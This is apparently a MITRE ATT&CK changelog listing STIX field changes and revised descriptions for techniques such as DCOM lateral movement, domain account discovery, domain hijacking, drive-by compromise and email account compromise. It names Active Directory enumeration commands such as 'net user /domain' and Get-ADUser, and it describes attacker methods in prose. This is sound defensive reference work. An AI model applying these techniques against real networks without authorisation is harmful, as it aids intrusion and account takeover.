external_references[1]['description']: Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved March 2, 2016. → Cisco. (2022, August 16). erase - Cisco IOS Configuration Fundamentals Command Reference. Retrieved July 13, 2022.
external_references[1]['url']: https://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf → https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/D_through_E.html#wp3557227463
external_references[2]['source_name']: Microsoft Sysmon v6 May 2017 → Novetta Blockbuster Destructive Malware
external_references[2]['description']: Russinovich, M. & Garnier, T. (2017, May 22). Sysmon v6.20. Retrieved December 13, 2017. → Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved March 2, 2016.
external_references[2]['url']: https://docs.microsoft.com/sysinternals/downloads/sysmon → https://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_data_sources[0]: Drive: Drive Access → Drive: Drive Modification
x_mitre_data_sources[1]: Command: Command Execution → Process: Process Creation
x_mitre_data_sources[2]: Process: Process Creation → Command: Command Execution
x_mitre_data_sources[4]: Drive: Drive Modification → Drive: Drive Access
x_mitre_version: 1.0 → 1.1
iterable_item_added (STIX field: new value)
external_references: {'source_name': 'Microsoft Sysmon v6 May 2017', 'description': 'Russinovich, M. & Garnier, T. (2017, May 22). Sysmon v6.20. Retrieved December 13, 2017.', 'url': 'https://docs.microsoft.com/sysinternals/downloads/sysmon'}
x_mitre_platforms: Network

[T1021.003] Remote Services: Distributed Component Object Model

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_attack_spec_version |  | 3.1.0
x_mitre_deprecated |  | False
dictionary_item_removed
STIX Field | Old value | New Value
x_mitre_permissions_required | ['Administrator', 'SYSTEM'] |
values_changed
STIX Field | Old value | New Value
modified | 2021-06-23 18:58:32.752000+00:00 | 2023-04-03 18:58:54.034000+00:00
external_references[3]['source_name'] | Microsoft Process Wide Com Keys | Microsoft COM ACL
external_references[3]['description'] | Microsoft. (n.d.). Setting Process-Wide Security Through the Registry. Retrieved November 21, 2017. | Microsoft. (n.d.). DCOM Security Enhancements in Windows XP Service Pack 2 and Windows Server 2003 Service Pack 1. Retrieved November 22, 2017.
external_references[3]['url'] | https://msdn.microsoft.com/en-us/library/windows/desktop/ms687317(v=vs.85).aspx | https://docs.microsoft.com/en-us/windows/desktop/com/dcom-security-enhancements-in-windows-xp-service-pack-2-and-windows-server-2003-service-pack-1
external_references[4]['source_name'] | Microsoft COM ACL | Microsoft Process Wide Com Keys
external_references[4]['description'] | Microsoft. (n.d.). DCOM Security Enhancements in Windows XP Service Pack 2 and Windows Server 2003 Service Pack 1. Retrieved November 22, 2017. | Microsoft. (n.d.). Setting Process-Wide Security Through the Registry. Retrieved November 21, 2017.
external_references[4]['url'] | https://docs.microsoft.com/en-us/windows/desktop/com/dcom-security-enhancements-in-windows-xp-service-pack-2-and-windows-server-2003-service-pack-1 | https://msdn.microsoft.com/en-us/library/windows/desktop/ms687317(v=vs.85).aspx
external_references[5]['source_name'] | Enigma Outlook DCOM Lateral Movement Nov 2017 | MSDN WMI
external_references[5]['description'] | Nelson, M. (2017, November 16). Lateral Movement using Outlook's CreateObject Method and DotNetToJScript. Retrieved November 21, 2017. | Microsoft. (n.d.). Windows Management Instrumentation. Retrieved April 27, 2016.
external_references[5]['url'] | https://enigma0x3.net/2017/11/16/lateral-movement-using-outlooks-createobject-method-and-dotnettojscript/ | https://msdn.microsoft.com/en-us/library/aa394582.aspx
external_references[6]['source_name'] | Enigma MMC20 COM Jan 2017 | Enigma DCOM Lateral Movement Jan 2017
external_references[6]['description'] | Nelson, M. (2017, January 5). Lateral Movement using the MMC20 Application COM Object. Retrieved November 21, 2017. | Nelson, M. (2017, January 23). Lateral Movement via DCOM: Round 2. Retrieved November 21, 2017.
external_references[6]['url'] | https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/ | https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
external_references[7]['source_name'] | Enigma DCOM Lateral Movement Jan 2017 | Enigma MMC20 COM Jan 2017
external_references[7]['description'] | Nelson, M. (2017, January 23). Lateral Movement via DCOM: Round 2. Retrieved November 21, 2017. | Nelson, M. (2017, January 5). Lateral Movement using the MMC20 Application COM Object. Retrieved November 21, 2017.
external_references[7]['url'] | https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/ | https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
external_references[8]['source_name'] | Enigma Excel DCOM Sept 2017 | Enigma Outlook DCOM Lateral Movement Nov 2017
external_references[8]['description'] | Nelson, M. (2017, September 11). Lateral Movement using Excel.Application and DCOM. Retrieved November 21, 2017. | Nelson, M. (2017, November 16). Lateral Movement using Outlook's CreateObject Method and DotNetToJScript. Retrieved November 21, 2017.
external_references[8]['url'] | https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/ | https://enigma0x3.net/2017/11/16/lateral-movement-using-outlooks-createobject-method-and-dotnettojscript/
external_references[9]['source_name'] | Cyberreason DCOM DDE Lateral Movement Nov 2017 | Enigma Excel DCOM Sept 2017
external_references[9]['description'] | Tsukerman, P. (2017, November 8). Leveraging Excel DDE for lateral movement via DCOM. Retrieved November 21, 2017. | Nelson, M. (2017, September 11). Lateral Movement using Excel.Application and DCOM. Retrieved November 21, 2017.
external_references[9]['url'] | https://www.cybereason.com/blog/leveraging-excel-dde-for-lateral-movement-via-dcom | https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/
external_references[10]['source_name'] | MSDN WMI | Cyberreason DCOM DDE Lateral Movement Nov 2017
external_references[10]['description'] | Microsoft. (n.d.). Windows Management Instrumentation. Retrieved April 27, 2016. | Tsukerman, P. (2017, November 8). Leveraging Excel DDE for lateral movement via DCOM. Retrieved November 21, 2017.
external_references[10]['url'] | https://msdn.microsoft.com/en-us/library/aa394582.aspx | https://www.cybereason.com/blog/leveraging-excel-dde-for-lateral-movement-via-dcom
x_mitre_data_sources[0] | Process: Process Creation | Module: Module Load
x_mitre_data_sources[2] | Module: Module Load | Process: Process Creation
x_mitre_version | 1.1 | 1.2

[T1087.002] Account Discovery: Domain Account

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior. Commands such as <code>net user /domain</code> and <code>net group /domain</code> of the [Net](https://attack.mitre.org/software/S0039) utility, <code>dscacheutil -q group</code> on macOS, and <code>ldapsearch</code> on Linux can list domain users and groups.

New Description
Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior such as targeting specific accounts which possess particular privileges. Commands such as <code>net user /domain</code> and <code>net group /domain</code> of the [Net](https://attack.mitre.org/software/S0039) utility, <code>dscacheutil -q group</code> on macOS, and <code>ldapsearch</code> on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets including <code>Get-ADUser</code> and <code>Get-ADGroupMember</code> may enumerate members of Active Directory groups.
Details
values_changed
STIX Field | Old value | New Value
modified | 2022-08-25 13:04:00.863000+00:00 | 2023-04-15 16:37:59.115000+00:00
description
  Old value: Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior. Commands such as net user /domain and net group /domain of the [Net](https://attack.mitre.org/software/S0039) utility, dscacheutil -q group on macOS, and ldapsearch on Linux can list domain users and groups.
  New value: Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior such as targeting specific accounts which possess particular privileges. Commands such as net user /domain and net group /domain of the [Net](https://attack.mitre.org/software/S0039) utility, dscacheutil -q group on macOS, and ldapsearch on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets including Get-ADUser and Get-ADGroupMember may enumerate members of Active Directory groups.
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_data_sources[0] | Command: Command Execution | Network Traffic: Network Traffic Content
x_mitre_data_sources[1] | Process: Process Creation | Process: OS API Execution
x_mitre_data_sources[2] | Network Traffic: Network Traffic Content | Process: Process Creation
x_mitre_data_sources[4] | Process: OS API Execution | Command: Command Execution
x_mitre_version | 1.1 | 1.2
iterable_item_removed
STIX Field | Old value | New Value
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/575.html', 'external_id': 'CAPEC-575'} |

[T1078.002] Valid Accounts: Domain Accounts

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-19 20:14:34.479000+00:00 | 2023-04-13 17:17:03.605000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.2 | 1.3
iterable_item_added
STIX Field | Old value | New Value
x_mitre_data_sources |  | User Account: User Account Authentication
iterable_item_removed
STIX Field | Old value | New Value
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/560.html', 'external_id': 'CAPEC-560'} |
x_mitre_data_sources | User Account: User Account Authentication |

[T1069.002] Permission Groups Discovery: Domain Groups

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-10-21 12:55:51.337000+00:00 | 2023-04-07 17:16:47.754000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.1 | 1.2
iterable_item_added
STIX Field | Old value | New Value
x_mitre_data_sources |  | Group: Group Enumeration
iterable_item_removed
STIX Field | Old value | New Value
x_mitre_data_sources | Group: Group Enumeration |

[T1584.001] Compromise Infrastructure: Domains

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019)

Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)

New Description
Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019)

Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)

Adversaries who compromise a domain may also engage in domain shadowing by creating malicious subdomains under their control while keeping any existing DNS records. As service will not be disrupted, the malicious subdomains may go unnoticed for long periods of time.(Citation: Palo Alto Unit 42 Domain Shadowing 2022)
Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-20 14:10:48.814000+00:00 | 2023-03-07 13:05:42.901000+00:00
description
  Old value: Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019) Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)
  New value: Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019) Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020) Adversaries who compromise a domain may also engage in domain shadowing by creating malicious subdomains under their control while keeping any existing DNS records. As service will not be disrupted, the malicious subdomains may go unnoticed for long periods of time.(Citation: Palo Alto Unit 42 Domain Shadowing 2022)
external_references[3]['source_name'] | Microsoft Sub Takeover 2020 | Palo Alto Unit 42 Domain Shadowing 2022
external_references[3]['description'] | Microsoft. (2020, September 29). Prevent dangling DNS entries and avoid subdomain takeover. Retrieved October 12, 2020. | Janos Szurdi, Rebekah Houser and Daiping Liu. (2022, September 21). Domain Shadowing: A Stealthy Use of DNS Compromise for Cybercrime. Retrieved March 7, 2023.
external_references[3]['url'] | https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover | https://unit42.paloaltonetworks.com/domain-shadowing/
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_data_sources[1] | Domain Name: Passive DNS | Domain Name: Domain Registration
x_mitre_data_sources[2] | Domain Name: Domain Registration | Domain Name: Passive DNS
x_mitre_version | 1.2 | 1.3
iterable_item_added
STIX Field | Old value | New Value
external_references |  | {'source_name': 'Microsoft Sub Takeover 2020', 'description': 'Microsoft. (2020, September 29). Prevent dangling DNS entries and avoid subdomain takeover. Retrieved October 12, 2020.', 'url': 'https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover'}

[T1189] Drive-by Compromise

Current version: 1.5

Version changed from: 1.4 → 1.5


Old Description
Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://attack.mitre.org/techniques/T1550/001).

Multiple ways of delivering exploit code to a browser exist, including:

* A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting.
* Malicious ads are paid for and served through legitimate ad providers.
* Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).

Often the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is often referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Shadowserver Strategic Web Compromise)

Typical drive-by compromise process:

1. A user visits a website that is used to host the adversary controlled content.
2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version.
    * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.
3. Upon finding a vulnerable version, exploit code is delivered to the browser.
4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place.
    * In some cases a second visit to the website after the initial scan is required before exploit code is delivered.

Unlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.

Adversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.(Citation: Volexity OceanLotus Nov 2017)

New Description
Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://attack.mitre.org/techniques/T1550/001).

Multiple ways of delivering exploit code to a browser exist (i.e., [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)), including:

* A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting
* Script files served to a legitimate website from a publicly writeable cloud storage bucket are modified by an adversary
* Malicious ads are paid for and served through legitimate ad providers (i.e., [Malvertising](https://attack.mitre.org/techniques/T1583/008))
* Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).

Often the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is often referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Shadowserver Strategic Web Compromise)

Typical drive-by compromise process:

1. A user visits a website that is used to host the adversary controlled content.
2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version.
    * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.
3. Upon finding a vulnerable version, exploit code is delivered to the browser.
4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place.
    * In some cases a second visit to the website after the initial scan is required before exploit code is delivered.

Unlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.

Adversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.(Citation: Volexity OceanLotus Nov 2017)

Dropped Mitigations:

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_attack_spec_version |  | 3.1.0
x_mitre_deprecated |  | False
dictionary_item_removed
STIX Field | Old value | New Value
x_mitre_permissions_required | ['User'] |
values_changed
STIX Field | Old value | New Value
modified | 2022-03-08 21:11:47.798000+00:00 | 2023-04-14 23:58:45.490000+00:00
description
  Old value: Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Multiple ways of delivering exploit code to a browser exist, including: * A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting. * Malicious ads are paid for and served through legitimate ad providers. * Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content). Often the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is often referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Shadowserver Strategic Web Compromise) Typical drive-by compromise process: 1. A user visits a website that is used to host the adversary controlled content. 2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes. 3. Upon finding a vulnerable version, exploit code is delivered to the browser. 4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place. * In some cases a second visit to the website after the initial scan is required before exploit code is delivered. Unlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ. Adversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.(Citation: Volexity OceanLotus Nov 2017)
  New value: Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Multiple ways of delivering exploit code to a browser exist (i.e., [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)), including: * A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting * Script files served to a legitimate website from a publicly writeable cloud storage bucket are modified by an adversary * Malicious ads are paid for and served through legitimate ad providers (i.e., [Malvertising](https://attack.mitre.org/techniques/T1583/008)) * Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content). Often the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is often referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Shadowserver Strategic Web Compromise) Typical drive-by compromise process: 1. A user visits a website that is used to host the adversary controlled content. 2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes. 3. Upon finding a vulnerable version, exploit code is delivered to the browser. 4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place. * In some cases a second visit to the website after the initial scan is required before exploit code is delivered. Unlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ. Adversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.(Citation: Volexity OceanLotus Nov 2017)
x_mitre_data_sources[2] | Network Traffic: Network Traffic Content | Process: Process Creation
x_mitre_version | 1.4 | 1.5
iterable_item_added
STIX Field | Old value | New Value
x_mitre_data_sources |  | Network Traffic: Network Traffic Content
iterable_item_removed
STIX Field | Old value | New Value
x_mitre_data_sources | Process: Process Creation |

[T1608.004] Stage Capabilities: Drive-by Target

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through browsing to adversary controlled sites, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). In such cases, the user's web browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on the site), but adversaries may also set up websites for non-exploitation behavior such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Prior to [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site. Drive-by content can be staged on adversary controlled infrastructure that has been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).

Adversaries may upload or inject malicious web content, such as [JavaScript](https://attack.mitre.org/techniques/T1059/007), into websites.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015) This may be done in a number of ways, including inserting malicious script into web pages or other user controllable web content such as forum posts. Adversaries may also craft malicious web advertisements and purchase ad space on a website through legitimate ad providers. In addition to staging content to exploit a user's web browser, adversaries may also stage scripting content to profile the user's browser (as in [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592)) to ensure it is vulnerable prior to attempting exploitation.(Citation: ATT ScanBox)

Websites compromised by an adversary and used to stage a drive-by may be ones visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is referred to a strategic web compromise or watering hole attack.

Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).

New Description
Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through browsing to adversary controlled sites, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). In such cases, the user's web browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on the site), but adversaries may also set up websites for non-exploitation behavior such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Prior to [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site. Drive-by content can be staged on adversary controlled infrastructure that has been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).

Adversaries may upload or inject malicious web content, such as [JavaScript](https://attack.mitre.org/techniques/T1059/007), into websites.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015) This may be done in a number of ways, including:

* Inserting malicious scripts into web pages or other user controllable web content such as forum posts
* Modifying script files served to websites from publicly writeable cloud storage buckets
* Crafting malicious web advertisements and purchasing ad space on a website through legitimate ad providers (i.e., [Malvertising](https://attack.mitre.org/techniques/T1583/008))

In addition to staging content to exploit a user's web browser, adversaries may also stage scripting content to profile the user's browser (as in [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592)) to ensure it is vulnerable prior to attempting exploitation.(Citation: ATT ScanBox)

Websites compromised by an adversary and used to stage a drive-by may be ones visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is referred to a strategic web compromise or watering hole attack.

Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).
Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_attack_spec_version |  | 3.1.0
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New value
modified | 2022-03-08 21:59:57.082000+00:00 | 2023-04-15 00:21:55.791000+00:00
description | (old description shown above) | (new description shown above)
external_references[1]['source_name'] | FireEye CFR Watering Hole 2012 | ATT ScanBox
external_references[1]['description'] | Kindlund, D. (2012, December 30). CFR Watering Hole Attack Details. Retrieved December 18, 2020. | Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework Used with Watering Hole Attacks. Retrieved October 19, 2020.
external_references[1]['url'] | https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html | https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
external_references[3]['source_name'] | ATT ScanBox | FireEye CFR Watering Hole 2012
external_references[3]['description'] | Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework Used with Watering Hole Attacks. Retrieved October 19, 2020. | Kindlund, D. (2012, December 30). CFR Watering Hole Attack Details. Retrieved December 18, 2020.
external_references[3]['url'] | https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks | https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html
x_mitre_version | 1.2 | 1.3

[T1586.002] Compromise Accounts: Email Accounts

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
Old Description

Adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566). Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).

A variety of methods exist for compromising email accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising email accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.

Adversaries can use a compromised email account to hijack existing email threads with targets of interest.

New Description

Adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598), [Phishing](https://attack.mitre.org/techniques/T1566), or large-scale spam email campaigns. Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship with, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).

A variety of methods exist for compromising email accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, brute forcing credentials (ex: password reuse from breach credential dumps), or paying employees, suppliers or business partners for access to credentials.(Citation: AnonHBGary)(Citation: Microsoft DEV-0537) Prior to compromising email accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. Adversaries may target compromising well-known email accounts or domains from which malicious spam or [Phishing](https://attack.mitre.org/techniques/T1566) emails may evade reputation-based email filtering rules.

Adversaries can use a compromised email account to hijack existing email threads with targets of interest.
Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_attack_spec_version |  | 3.1.0
x_mitre_contributors |  | ['Tristan Bennett, Seamless Intelligence', 'Bryan Onel']
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New value
modified | 2021-04-15 02:57:25.544000+00:00 | 2023-04-11 01:07:48.218000+00:00
description | (old description shown above) | (new description shown above)
x_mitre_version | 1.0 | 1.1
iterable_item_added
STIX Field | Old value | New value
external_references |  | {'source_name': 'Microsoft DEV-0537', 'description': 'Microsoft. (2022, March 22). DEV-0537 criminal actor targeting organizations for data exfiltration and destruction. Retrieved March 23, 2022.', 'url': 'https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/'}

[T1114] Email Collection

Current version: 2.4

Version changed from: 2.3 → 2.4

Dropped Mitigations:

